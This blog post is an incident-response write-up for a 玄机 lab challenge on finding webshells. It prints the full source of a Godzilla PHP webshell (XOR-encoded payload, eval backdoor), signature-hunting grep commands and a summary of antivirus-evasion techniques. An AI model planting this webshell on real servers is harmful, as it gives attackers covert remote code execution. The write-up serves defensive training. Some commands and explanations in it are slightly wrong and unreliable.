<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <meta name="keywords" content="Hexo Theme Keep">
    <meta name="description" content="Hexo Theme Keep">
    <meta name="author" content="Lwwww">
    
    <title>
        
            玄机靶场 |
        
        Lwwww&#39;s Blog
    </title>
    
<link rel="stylesheet" href="/css/style.css">

    
        <link rel="shortcut icon" href="/images/dog.svg">
    
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.2.5/font/css/fontawesome.min.css">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.2.5/font/css/regular.min.css">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.2.5/font/css/solid.min.css">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.2.5/font/css/brands.min.css">
    
        
            
        
    
    <script class="keep-theme-configurations">
    const KEEP = window.KEEP || {}
    KEEP.hexo_config = {"hostname":"example.com","root":"/","language":"en","path":"search.json"}
    KEEP.theme_config = {"base_info":{"primary_color":"#b2bec3","title":"Lwwww's Blog","author":"Lwwww","avatar":"/images/dog.svg","logo":"/images/dog.svg","favicon":"/images/dog.svg"},"menu":{"home":"/","archives":"/archives","categories":"/categories","links":"/links","about":"/about"},"first_screen":{"enable":true,"background_img":"/images/bg.svg","background_img_dark":"/images/bg.svg","description":"铭心渐行","hitokoto":false},"social_contact":{"enable":true,"links":{"weixin":"/images/vx.jpg","qq":"/images/qq.jpg","赞赏":"/images/zs.jpg"}},"scroll":{"progress_bar":true,"percent":true,"hide_header":false},"home":{"announcement":null,"category":true,"tag":true,"post_datetime":"updated"},"post":{"author_badge":{"enable":true,"level_badge":true,"custom_badge":["亮汪汪","亮汪汪汪","亮汪汪汪汪"]},"word_count":{"wordcount":true,"min2read":true},"datetime_format":"YYYY-MM-DD HH:mm:ss","copyright_info":true,"share":true,"reward":{"enable":true,"img_link":"/images/zs.jpg","text":"给亮汪汪买点狗粮吧⋆⋅☆(✪ω✪)☆⋅⋆","icon":null}},"code_block":{"tools":{"enable":true,"style":"default"},"highlight_theme":"default"},"toc":{"enable":true,"number":false,"expand_all":true,"init_open":true,"layout":"right"},"website_count":{"busuanzi_count":{"enable":true,"site_uv":true,"site_pv":true,"page_pv":true}},"local_search":{"enable":true,"preload":true},"comment":{"enable":false,"use":"valine","valine":{"appid":null,"appkey":null,"server_urls":null,"placeholder":null},"gitalk":{"github_id":null,"github_admins":null,"repository":null,"client_id":null,"client_secret":null,"proxy":null},"twikoo":{"env_id":null,"region":null,"version":"1.6.39"},"waline":{"server_url":null,"reaction":false,"version":"3.3.2"},"giscus":{"repo":null,"repo_id":null,"category":"Announcements","category_id":null,"reactions_enabled":false},"artalk":{"server":null},"disqus":{"shortname":null}},"rss":{"enable":false},"lazyload":{"enable":true},"cdn":{"enable":true,"provider":"cdnjs"},"pjax":{"enable":false},"footer":{"since":2025,"word_count":true,"site_deploy":{"enable":false,"provider":"github","url":null},"record":{"enable":false,"list":[{"code":null,"link":null}]}},"inject":{"enable":true,"css":[null],"js":["/js/usetime.js"]},"root":"","source_data":{"links":[{"title":"大师傅们"},{"name":"_sun_","link":"https://sun1028.top","description":"非常非常优秀的学弟，WEB的宠儿","avatar":"https://s3.ax1x.com/2020/11/17/DVvkB4.jpg"},"......","......","......"],"icons":{"赞赏":{"svg":"<svg t=\"1737602637086\" class=\"icon\" viewBox=\"0 0 1024 1024\" version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" p-id=\"17503\" width=\"200\" height=\"200\"><path d=\"...\"></path></svg>","link":"img | /images/zs.jpg"}}},"version":"4.2.5"}
    KEEP.language_ago = {"second":"%s seconds ago","minute":"%s minutes ago","hour":"%s hours ago","day":"%s days ago","week":"%s weeks ago","month":"%s months ago","year":"%s years ago"}
    KEEP.language_code_block = {"copy":"Copy code","copied":"Copied","fold":"Fold code block","folded":"Folded"}
    KEEP.language_copy_copyright = {"copy":"Copy copyright info","copied":"Copied","title":"Original post title","author":"Original post author","link":"Original post link"}
  </script>
<meta name="generator" content="Hexo 7.3.0"></head>


<body>
<div class="progress-bar-container">
    
        <span class="scroll-progress-bar"></span>
    

    
</div>



<main class="page-container border-box">
    <!-- home first screen  -->
    

    <!-- page content -->
    <div class="page-main-content border-box">
        <div class="page-main-content-top">
            
<header class="header-wrapper">

    <div class="border-box header-content">
        <div class="left flex-start border-box">
            
                <a class="logo-image border-box" href="/">
                    <img src="/images/dog.svg">
                </a>
            
            <a class="site-name border-box" href="/">
               Lwwww&#39;s Blog
            </a>
        </div>

        <div class="right border-box">
            <div class="pc border-box">
                <ul class="menu-list border-box">
                    
                        
                        <li class="menu-item flex-start border-box">
                            <a class="menu-text-color border-box" href="/">
                                
                                HOME
                                
                            </a>
                            
                        </li>
                    
                        
                        <li class="menu-item flex-start border-box">
                            <a class="menu-text-color border-box" href="/archives">
                                
                                ARCHIVES
                                
                            </a>
                            
                        </li>
                    
                        
                        <li class="menu-item flex-start border-box">
                            <a class="menu-text-color border-box" href="/categories">
                                
                                CATEGORIES
                                
                            </a>
                            
                        </li>
                    
                        
                        <li class="menu-item flex-start border-box">
                            <a class="menu-text-color border-box" href="/links">
                                
                                LINKS
                                
                            </a>
                            
                        </li>
                    
                        
                        <li class="menu-item flex-start border-box">
                            <a class="menu-text-color border-box" href="/about">
                                
                                ABOUT
                                
                            </a>
                            
                        </li>
                    
                    
                        <li class="menu-item search search-popup-trigger">
                            <i class="menu-text-color fas search fa-search"></i>
                        </li>
                    
                </ul>
            </div>
            <div class="mobile border-box flex-start">
                
                    <div class="icon-item search search-popup-trigger"><i class="fas fa-search"></i></div>
                
                <div class="icon-item menu-bar">
                    <div class="menu-bar-middle"></div>
                </div>
            </div>
        </div>
    </div>

    <div class="header-drawer">
        <ul class="drawer-menu-list border-box">
            
                
                <li class="drawer-menu-item border-box not-sub-menu">
                    <label class="drawer-menu-label border-box">
                        <a class="drawer-menu-text-color left-side flex-start border-box" href="/">
                            
                            HOME
                        </a>
                        
                    </label>
                    
                </li>
            
                
                <li class="drawer-menu-item border-box not-sub-menu">
                    <label class="drawer-menu-label border-box">
                        <a class="drawer-menu-text-color left-side flex-start border-box" href="/archives">
                            
                            ARCHIVES
                        </a>
                        
                    </label>
                    
                </li>
            
                
                <li class="drawer-menu-item border-box not-sub-menu">
                    <label class="drawer-menu-label border-box">
                        <a class="drawer-menu-text-color left-side flex-start border-box" href="/categories">
                            
                            CATEGORIES
                        </a>
                        
                    </label>
                    
                </li>
            
                
                <li class="drawer-menu-item border-box not-sub-menu">
                    <label class="drawer-menu-label border-box">
                        <a class="drawer-menu-text-color left-side flex-start border-box" href="/links">
                            
                            LINKS
                        </a>
                        
                    </label>
                    
                </li>
            
                
                <li class="drawer-menu-item border-box not-sub-menu">
                    <label class="drawer-menu-label border-box">
                        <a class="drawer-menu-text-color left-side flex-start border-box" href="/about">
                            
                            ABOUT
                        </a>
                        
                    </label>
                    
                </li>
            
        </ul>
    </div>

    <div class="window-mask"></div>

</header>


        </div>

        <div class="page-main-content-middle border-box">

            <div class="main-content border-box">
                

                    
<div class="fade-in-down-animation">
    <div class="post-page-container border-box">
        <div class="post-content-container border-box">
            

            <div class="post-content-bottom border-box">
                
                    <div class="post-title">
                        玄机靶场
                    </div>
                

                
                    <div class="post-header border-box">
                        
                            <div class="avatar-box border-box">
                                <img src="/images/dog.svg">
                            </div>
                        
                        <div class="info-box">
                            <div class="author border-box">
                                <span class="name">Lwwww</span>
                                
                                    <span class="author-badge">Lv3</span>
                                
                            </div>
                            <div class="meta-info border-box">
                                

<div class="post-meta-info-container border-box post">
    <div class="post-meta-info border-box">
        

        
            <span class="meta-info-item post-create-date">
                <i class="icon fa-solid fa-calendar-plus"></i>&nbsp;
                <span class="datetime">2025-03-04 16:00:35</span>
            </span>

            
                <span class="meta-info-item post-update-date">
                    <i class="icon fa-solid fa-file-pen"></i>&nbsp;
                    <span class="datetime" data-updated="Wed Mar 05 2025 11:08:06 GMT+0800">2025-03-05 11:08:06</span>
                </span>
            
        

        

        
            <span class="post-tag meta-info-item border-box">
                <ul class="post-tag-ul">
                    
                            <li class="tag-item"><span class="tag-separator"><i class="icon fas fa-hashtag"></i></span><a href="/tags/WP-%E7%8E%84%E6%9C%BA-%E5%BA%94%E6%80%A5%E5%93%8D%E5%BA%94/">-WP -玄机 -应急响应</a></li>
                        
                    
                </ul>
            </span>
        

        
        
            <span class="meta-info-item post-wordcount">
                <i class="icon fas fa-file-word"></i>&nbsp;<span>3.2k Words</span>
            </span>
        
        
            <span class="meta-info-item post-min2read">
                <i class="icon fas fa-clock"></i>&nbsp;<span>13 Mins</span>
            </span>
        
        
            <span class="meta-info-item post-pv">
                <i class="icon fas fa-eye"></i>&nbsp;<span id="busuanzi_value_page_pv"></span>
            </span>
        
    </div>

    
</div>

                            </div>
                        </div>
                    </div>
                

                <div class="post-content keep-markdown-body ">
                    

                    
                         <h2 id="第一章-应急响应-webshell查杀"><a href="#第一章-应急响应-webshell查杀" class="headerlink" title="第一章 应急响应-webshell查杀"></a>第一章 应急响应-webshell查杀</h2><p>简介 靶机账号密码 root xjwebshell<br>1.黑客webshell里面的flag flag{xxxxx-xxxx-xxxx-xxxx-xxxx}<br>2.黑客使用的什么工具的shell github地址的md5 flag{md5}<br>3.黑客隐藏shell的完整路径的md5 flag{md5} 注 : &#x2F;xxx&#x2F;xxx&#x2F;xxx&#x2F;xxx&#x2F;xxx.xxx<br>4.黑客免杀马完整路径 md5 flag{md5}</p>
<p>强烈推荐<a class="link"   target="_blank" rel="noopener" href="https://peterpan.blog.csdn.net/?type=blog" >Peterpan.exe<i class="fas fa-external-link-alt"></i></a>师傅的wp</p>
<p>首先给出环境我以为是仿真靶场，捣鼓了半天没弄明白 结果是去远程连接linux 我真是二逼</p>
<h4 id="1-黑客webshell里面的flag-flag-xxxxx-xxxx-xxxx-xxxx-xxxx"><a href="#1-黑客webshell里面的flag-flag-xxxxx-xxxx-xxxx-xxxx-xxxx" class="headerlink" title="1.黑客webshell里面的flag flag{xxxxx-xxxx-xxxx-xxxx-xxxx}"></a>1.黑客webshell里面的flag flag{xxxxx-xxxx-xxxx-xxxx-xxxx}</h4><p>1.可疑函数调用 ◦ WebShell通常会使用一些危险的函数来执行系统命令或代码，如：  ▪ PHP: eval(), system(), exec(), shell_exec(), passthru(), assert(), base64_decode() ▪ ASP: Execute(), Eval(), CreateObject() ▪ JSP: Runtime.getRuntime().exec()     </p>
<ol start="2">
<li>编码和解码 ◦ WebShell经常使用编码和解码技术来隐藏其真实意图，如Base64编码：</li>
</ol>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">eval</span>(<span class="title function_ invoke__">base64_decode</span>(<span class="string">&#x27;encoded_string&#x27;</span>));</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>文件操作 ◦ WebShell可能会包含文件操作函数，用于读取、写入或修改文件： </p>
<p> ▪ PHP: fopen(), fwrite(), file_get_contents(), file_put_contents() ▪ ASP: FileSystemObject    </p>
<ol start="4">
<li><p>网络操作 ◦ WebShell可能会包含网络操作函数，用于与远程服务器通信： </p>
<p> ▪ PHP: fsockopen(), curl_exec(), file_get_contents(‘http:&#x2F;&#x2F;…’) ▪ ASP: WinHttp.WinHttpRequest      </p>
<p>上面刚刚也说了我们可以尝试定位一些特殊的后缀文件，例如：.asp、.php、.jsp、.aspx。</p>
</li>
</ol>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//搜索目录下适配当前应用的网页文件，查看内容是否有Webshell特征</span></span><br><span class="line">find ./ type f -name <span class="string">&quot;*.jsp&quot;</span> | xargs grep <span class="string">&quot;exec(&quot;</span> </span><br><span class="line">find ./ type f -name <span class="string">&quot;*.php&quot;</span> | xargs grep <span class="string">&quot;eval(&quot;</span> </span><br><span class="line">find ./ type f -name <span class="string">&quot;*.asp&quot;</span> | xargs grep <span class="string">&quot;execute(&quot;</span> </span><br><span class="line">find ./ type f -name <span class="string">&quot;*.aspx&quot;</span> | xargs grep <span class="string">&quot;eval(&quot;</span> </span><br><span class="line"> </span><br><span class="line"><span class="comment">//对于免杀Webshell，可以查看是否使用编码</span></span><br><span class="line">find ./ type f -name <span class="string">&quot;*.php&quot;</span> | xargs grep <span class="string">&quot;base64_decode&quot;</span> </span><br></pre></td></tr></table></figure>

<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">本题步骤就是：</span><br><span class="line">find ./ type f -name &quot;*.php&quot; | xargs grep &quot;eval(&quot;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>最后终于在gz.php里面发现了；</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">@<span class="title function_ invoke__">session_start</span>();</span><br><span class="line">@<span class="title function_ invoke__">set_time_limit</span>(<span class="number">0</span>);</span><br><span class="line">@<span class="title function_ invoke__">error_reporting</span>(<span class="number">0</span>);</span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">encode</span>(<span class="params"><span class="variable">$D</span>,<span class="variable">$K</span></span>)</span>&#123;</span><br><span class="line">    <span class="keyword">for</span>(<span class="variable">$i</span>=<span class="number">0</span>;<span class="variable">$i</span>&lt;<span class="title function_ invoke__">strlen</span>(<span class="variable">$D</span>);<span class="variable">$i</span>++) &#123;</span><br><span class="line">        <span class="variable">$c</span> = <span class="variable">$K</span>[<span class="variable">$i</span>+<span class="number">1</span>&amp;<span class="number">15</span>];</span><br><span class="line">        <span class="variable">$D</span>[<span class="variable">$i</span>] = <span class="variable">$D</span>[<span class="variable">$i</span>]^<span class="variable">$c</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> <span class="variable">$D</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">//027ccd04-5065-48b6-a32d-77c704a5e26d</span></span><br><span class="line"><span class="variable">$payloadName</span>=<span class="string">&#x27;payload&#x27;</span>;</span><br><span class="line"><span class="variable">$key</span>=<span class="string">&#x27;3c6e0b8a9c15224a&#x27;</span>;</span><br><span class="line"><span class="variable">$data</span>=<span class="title function_ invoke__">file_get_contents</span>(<span class="string">&quot;php://input&quot;</span>);</span><br><span class="line"><span class="keyword">if</span> (<span class="variable">$data</span>!==<span class="literal">false</span>)&#123;</span><br><span class="line">    <span class="variable">$data</span>=<span class="title function_ invoke__">encode</span>(<span class="variable">$data</span>,<span class="variable">$key</span>);</span><br><span class="line">    <span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$_SESSION</span>[<span class="variable">$payloadName</span>]))&#123;</span><br><span class="line">        <span class="variable">$payload</span>=<span class="title function_ invoke__">encode</span>(<span class="variable">$_SESSION</span>[<span class="variable">$payloadName</span>],<span class="variable">$key</span>);</span><br><span class="line">        <span class="keyword">if</span> (<span class="title function_ invoke__">strpos</span>(<span class="variable">$payload</span>,<span class="string">&quot;getBasicsInfo&quot;</span>)===<span class="literal">false</span>)&#123;</span><br><span class="line">            <span class="variable">$payload</span>=<span class="title function_ invoke__">encode</span>(<span class="variable">$payload</span>,<span class="variable">$key</span>);</span><br><span class="line">        &#125;</span><br><span class="line">		<span class="keyword">eval</span>(<span class="variable">$payload</span>);</span><br><span class="line">        <span class="keyword">echo</span> <span class="title function_ invoke__">encode</span>(@<span class="title function_ invoke__">run</span>(<span class="variable">$data</span>),<span class="variable">$key</span>);</span><br><span class="line">    &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">        <span class="keyword">if</span> (<span class="title function_ invoke__">strpos</span>(<span class="variable">$data</span>,<span class="string">&quot;getBasicsInfo&quot;</span>)!==<span class="literal">false</span>)&#123;</span><br><span class="line">            <span class="variable">$_SESSION</span>[<span class="variable">$payloadName</span>]=<span class="title function_ invoke__">encode</span>(<span class="variable">$data</span>,<span class="variable">$key</span>);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">@<span class="title function_ invoke__">session_start</span>();：启动会话</span><br><span class="line"></span><br><span class="line">@<span class="title function_ invoke__">set_time_limit</span>(<span class="number">0</span>);：设置脚本执行时间限制为无限制</span><br><span class="line"></span><br><span class="line">@<span class="title function_ invoke__">error_reporting</span>(<span class="number">0</span>);：关闭错误报告</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">encode</span>(<span class="params"><span class="variable">$D</span>,<span class="variable">$K</span></span>)</span>&#123;...&#125;：定义了一个名为 encode 的函数，它接受两个参数 <span class="variable">$D</span> 和 <span class="variable">$K</span>。这个函数看起来像是一个简单的异或编码函数，用于对数据进行加密或解密。它使用 <span class="variable">$K</span> 作为密钥，对 <span class="variable">$D</span> 中的每个字符进行异或操作。</span><br><span class="line"></span><br><span class="line">接下来的几行代码定义了 <span class="variable">$payloadName</span>、<span class="variable">$key</span> 和 <span class="variable">$data</span> 变量。<span class="variable">$payloadName</span> 是用于存储有效载荷的会话变量名，<span class="variable">$key</span> 是用于编码的密钥，<span class="variable">$data</span> 是从 php:<span class="comment">//input 流中读取的数据。</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> (<span class="variable">$data</span>!==<span class="literal">false</span>)&#123;...&#125;：如果从 php:<span class="comment">//input 读取的数据不是 false（即成功读取了数据），则执行以下代码块。</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$_SESSION</span>[<span class="variable">$payloadName</span>]))&#123;...&#125;：检查 <span class="variable">$payloadName</span> 对应的会话变量是否已设置。</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> (<span class="title function_ invoke__">strpos</span>(<span class="variable">$payload</span>,<span class="string">&quot;getBasicsInfo&quot;</span>)===<span class="literal">false</span>)&#123;...&#125;：检查 <span class="variable">$payload</span> 变量中是否包含字符串 <span class="string">&quot;getBasicsInfo&quot;</span>。</span><br><span class="line"></span><br><span class="line"><span class="keyword">eval</span>(<span class="variable">$payload</span>);：如果 <span class="variable">$payload</span> 变量包含 <span class="string">&quot;getBasicsInfo&quot;</span> 字符串，则执行 <span class="variable">$payload</span> 变量中的 PHP 代码。</span><br><span class="line"></span><br><span class="line"><span class="keyword">echo</span> <span class="title function_ invoke__">encode</span>(@<span class="title function_ invoke__">run</span>(<span class="variable">$data</span>),<span class="variable">$key</span>);：如果 <span class="variable">$data</span> 包含 <span class="string">&quot;getBasicsInfo&quot;</span> 字符串，则执行 @<span class="title function_ invoke__">run</span>(<span class="variable">$data</span>) 函数，并将结果编码后输出。</span><br><span class="line">————————————————</span><br><span class="line"></span><br><span class="line">                            版权声明：本文为博主原创文章，遵循 CC <span class="number">4.0</span> BY-SA 版权协议，转载请附上原文出处链接和本声明。</span><br><span class="line">                        </span><br><span class="line">原文链接：https:<span class="comment">//blog.csdn.net/administratorlws/article/details/139521078</span></span><br></pre></td></tr></table></figure>

<p>这段代码的目的是接收通过 <code>php://input</code> 流发送的数据，对其进行编码，并根据会话变量中的内容执行特定的 PHP 代码。这通常用于隐藏恶意代码或后门，使得攻击者可以通过特定的请求触发执行。</p>
<h4 id="步骤-1-2黑客使用的什么工具的shell-github地址的md5-flag-md5"><a href="#步骤-1-2黑客使用的什么工具的shell-github地址的md5-flag-md5" class="headerlink" title="步骤#1.2黑客使用的什么工具的shell github地址的md5 flag{md5}"></a>步骤#1.2黑客使用的什么工具的shell github地址的md5 flag{md5}</h4><p>遇到这种类型的题目，我们就是要分析一下是什么类型的webshell，其实开头三句就可以分析出是godzilla的webshell了；</p>
<p>为什么这样说？</p>
<p>哥斯拉病毒是一种Java后门木马，通常用于攻击并控制<a class="link"   target="_blank" rel="noopener" href="https://so.csdn.net/so/search?q=Web%E6%9C%8D%E5%8A%A1%E5%99%A8&spm=1001.2101.3001.7020" >Web服务器<i class="fas fa-external-link-alt"></i></a>。特征就包括：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">1. @session_start(); - 开启一个会话。</span><br><span class="line">2. @set_time_limit(0); - 设置脚本执行时间为无限。 </span><br><span class="line">3. @error_reporting(0); - 关闭所有错误报告。</span><br></pre></td></tr></table></figure>

<p>这些代码行主要用于隐藏病毒活动并确保其能够长时间运行而不被发现。哥斯拉病毒通常会通过Webshell或其他漏洞注入到服务器中，然后使用这些命令来掩盖其存在并执行进一步的恶意操作。</p>
<p>所以我们只需要找到它的github地址并且进行MD5加密即可；</p>
<pre><code>Godzilla地址：https://github.com/BeichenDream/Godzilla
</code></pre>
<h4 id="步骤-1-3黑客隐藏shell的完整路径的md5-flag-md5-注-xxx-xxx-xxx-xxx-xxx-xxx"><a href="#步骤-1-3黑客隐藏shell的完整路径的md5-flag-md5-注-xxx-xxx-xxx-xxx-xxx-xxx" class="headerlink" title="步骤#1.3黑客隐藏shell的完整路径的md5 flag{md5} 注 : &#x2F;xxx&#x2F;xxx&#x2F;xxx&#x2F;xxx&#x2F;xxx.xxx"></a>步骤#1.3黑客隐藏shell的完整路径的md5 flag{md5} 注 : &#x2F;xxx&#x2F;xxx&#x2F;xxx&#x2F;xxx&#x2F;xxx.xxx</h4><p>那既然说黑客隐藏shell了，那我们肯定需要用到命令ls -la进行查找；</p>
<p>然后发现在挨个查找的过程中发现.Mysqlli.php如果普通的ls查看目录是查不出来的，必须用到ls -la才行，所以它就是隐藏了，我们直接定位一些它的路径，进行MD5加密即可；</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">root@ip-10-0-10-3:/var/www/html/include# cd Db</span><br><span class="line">root@ip-10-0-10-3:/var/www/html/include/Db# ls</span><br><span class="line">Mysqli.php  Mysql.php  Sqlite.php</span><br><span class="line">root@ip-10-0-10-3:/var/www/html/include/Db# ls -l</span><br><span class="line">total 24</span><br><span class="line">-rwxr-xr-x 1 www-data www-data 4752 Mar 14  2021 Mysqli.php</span><br><span class="line">-rwxr-xr-x 1 www-data www-data 4921 Mar 14  2021 Mysql.php</span><br><span class="line">-rwxr-xr-x 1 www-data www-data 4433 Mar 14  2021 Sqlite.php</span><br><span class="line">root@ip-10-0-10-3:/var/www/html/include/Db# ls -a</span><br><span class="line">.  ..  .Mysqli.php  Mysqli.php	Mysql.php  Sqlite.php</span><br><span class="line">root@ip-10-0-10-3:/var/www/html/include/Db# ls -la</span><br><span class="line">total 36</span><br><span class="line">drwxr-xr-x 2 www-data www-data 4096 Aug  2  2023 .</span><br><span class="line">drwxr-xr-x 4 www-data www-data 4096 Aug  2  2023 ..</span><br><span class="line">-rw-r--r-- 1 www-data www-data  768 Aug  2  2023 .Mysqli.php</span><br><span class="line">-rwxr-xr-x 1 www-data www-data 4752 Mar 14  2021 Mysqli.php</span><br><span class="line">-rwxr-xr-x 1 www-data www-data 4921 Mar 14  2021 Mysql.php</span><br><span class="line">-rwxr-xr-x 1 www-data www-data 4433 Mar 14  2021 Sqlite.php</span><br><span class="line">root@ip-10-0-10-3:/var/www/html/include/Db# pwd</span><br><span class="line">/var/www/html/include/Db</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">注意：在finnalshell里面可以直接看到目录结构比命令好找 更方便</span><br></pre></td></tr></table></figure>

<h4 id="步骤-1-4黑客免杀马完整路径-md5-flag-md5"><a href="#步骤-1-4黑客免杀马完整路径-md5-flag-md5" class="headerlink" title="步骤#1.4黑客免杀马完整路径 md5 flag{md5}"></a>步骤#1.4黑客免杀马完整路径 md5 flag{md5}</h4><h4 id=""><a href="#" class="headerlink" title=""></a></h4><h5 id="什么是免杀马？"><a href="#什么是免杀马？" class="headerlink" title="什么是免杀马？"></a>什么是免杀马？</h5><p>免杀马（免杀病毒或免杀Webshell）是指经过特殊处理和混淆，使其能够避开杀毒软件和安全检测工具识别的恶意软件或后门程序。黑客使用各种技术手段，使恶意代码看起来像是正常代码，从而躲避签名检测和基于规则的安全机制。这种技术通常用于Webshell和其他后门程序，目的是保持对受害系统的隐蔽访问。</p>
<p>免杀马（免杀病毒或免杀Webshell）是指经过特殊处理和混淆，使其能够避开杀毒软件和安全检测工具识别的恶意软件或后门程序。黑客使用各种技术手段，使恶意代码看起来像是正常代码，从而躲避签名检测和基于规则的安全机制。这种技术通常用于Webshell和其他后门程序，目的是保持对受害系统的隐蔽访问。</p>
<pre><code>常见的免杀技术；

代码混淆：
    使用混淆工具或手动混淆代码，使其难以被直接阅读和分析。

编码和加密：
    使用Base64、ROT13等编码方式或更复杂的加密技术隐藏恶意代码片段。

动态生成和执行：
    通过动态生成代码并在运行时执行，绕过静态分析。例如，使用 eval()、create_function() 等PHP函数。

多层解码：
    多层编码或加密，增加分析和检测的难度。

使用合法函数：
    恶意代码嵌入到看似合法的代码中，利用正常的函数调用执行恶意操作。

查找和处理免杀马的方法；

文件完整性检查：
    比较当前文件与已知的良性备份文件，发现被修改或新增的文件。

代码审查：
    手动检查可疑文件，寻找混淆、编码、加密和动态执行的代码模式。

安全扫描工具：
    使用高级安全扫描工具，这些工具使用行为分析和机器学习来检测潜在的免杀马。

日志分析：
    查看服务器访问日志和错误日志，寻找异常访问和执行模式。
    检查文件修改时间，与正常更新周期不符的文件可能是可疑的。

基于特征的检测：
    使用YARA规则等特征检测工具，根据已知的免杀马特征进行扫描。

总结：免杀马通过静态检测是检测不到的，因为在免杀的过程中将webshel的特征值以及特征函数都给去掉了，因为webshell执行会在网站日志留下记录，那我们就到网站日志里面看看有啥可疑的记录，这里也顺便说一下linux的日志存放在/var/log目录下。
</code></pre>
<p>这里我们总结一下常见网站日志的路径：</p>
<p>IIS（Internet Information Services）</p>
<p>IIS是Windows上的默认Web服务器，其日志文件默认存储在以下路径：</p>
<pre><code>IIS 6.0 及更早版本：

C:\WINDOWS\system32\LogFiles\W3SVC[SiteID]\

IIS 7.0 及更高版本：

C:\inetpub\logs\LogFiles\W3SVC[SiteID]\

其中，[SiteID] 是网站的标识符，通常是一个数字。
</code></pre>
<p>Apache HTTP Server</p>
<p>如果在Windows上安装了Apache，日志文件默认存储在安装目录下的logs文件夹中：</p>
<p>C:\Program Files (x86)\Apache Group\Apache2\logs\</p>
<p>或者</p>
<p>C:\Program Files\Apache Group\Apache2\logs\</p>
<p>具体路径取决于安装时选择的位置。</p>
<p>Linux系统中的网站日志路径</p>
<p>Apache HTTP Server</p>
<p>在Linux上，Apache日志文件通常位于以下目录：</p>
<pre><code>访问日志：

/var/log/apache2/access.log

或者

/var/log/httpd/access_log

错误日志：

/var/log/apache2/error.log

或

/var/log/httpd/error_log
</code></pre>
<p>不同的Linux发行版可能有不同的目录。例如，在Debian&#x2F;Ubuntu上通常使用&#x2F;var&#x2F;log&#x2F;apache2&#x2F;，而在Red Hat&#x2F;CentOS上通常使用&#x2F;var&#x2F;log&#x2F;httpd&#x2F;。</p>
<p>Nginx</p>
<p>Nginx是另一个流行的Web服务器，默认的日志文件路径如下：</p>
<pre><code>访问日志：

/var/log/nginx/access.log

错误日志：

/var/log/nginx/error.log
</code></pre>
<h5 id="如何查看和分析日志文件？"><a href="#如何查看和分析日志文件？" class="headerlink" title="如何查看和分析日志文件？"></a>如何查看和分析日志文件？</h5><pre><code>Windows：
    使用文本编辑器（如Notepad、Notepad++）直接打开日志文件查看。
    可以使用IIS管理器查看IIS日志。

Linux：

    使用命令行工具查看日志，例如：

